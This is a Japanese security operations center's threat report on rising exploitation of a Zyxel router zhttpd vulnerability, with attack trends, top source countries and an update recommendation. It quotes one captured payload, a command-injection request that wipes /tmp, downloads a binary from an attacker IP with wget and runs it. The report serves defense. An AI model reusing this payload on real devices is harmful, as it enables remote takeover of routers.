本サイトは、快適にご利用いただくためにクッキー(Cookie)を使用しております。
Cookieの使用に同意いただける場合は「同意する」ボタンを押してください。
なお本サイトのCookie使用については、「個人情報保護方針」をご覧ください。
Zyxel製ルータの脆弱性を狙った攻撃
今月は、Zyxel製ルータの脆弱性を狙った攻撃が増加しました。Zyxelルータの/bin/zhttpdコンポーネントの脆弱性を狙った攻撃となっており、攻撃者にリモートから任意のコードを実行されてしまう恐れがあります。
下図は、今年6月から7月末までの本脆弱性を狙った攻撃数の推移です。弊社SOCでは、2022年12月17日の初観測以降は、断続的に攻撃を観測していましたが、6月の中旬以降に攻撃が増加しています。
 |
下図は、弊社SOCで実際に検知した攻撃のパケットペイロードです。wgetコマンドで不正なファイルを取得して実行を試みた通信となっています。本脆弱性の対象は、Zyxel製の複数のルータが対象となっています。該当製品を利用している場合は、最新のバージョンにアップデートすることをお勧めします。
| GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://103[.]110[.]33[.]164/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep; |
6月および7月における本攻撃の攻撃元国の上位5件は以下の通りです。韓国からの攻撃が多くなっていました。
| # | 6月 | 7月 | ||
| 1 | 韓国 | 40.3% | 韓国 | 43.6% |
| 2 | 中国 | 14.3% | アメリカ | 19.5% |
| 3 | アメリカ | 13.3% | 日本 | 8.9% |
| 4 | 香港 | 10.8% | ベネズエラ | 4.5% |
| 5 | 日本 | 10.0% | イタリア | 3.7% |
参考情報
- Zyxel security advisory for remote code execution and denial-of-service vulnerabilities of CPE
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-remote-code-execution-and-denial-of-service-vulnerabilities-of-cpe
MBSD-SOC
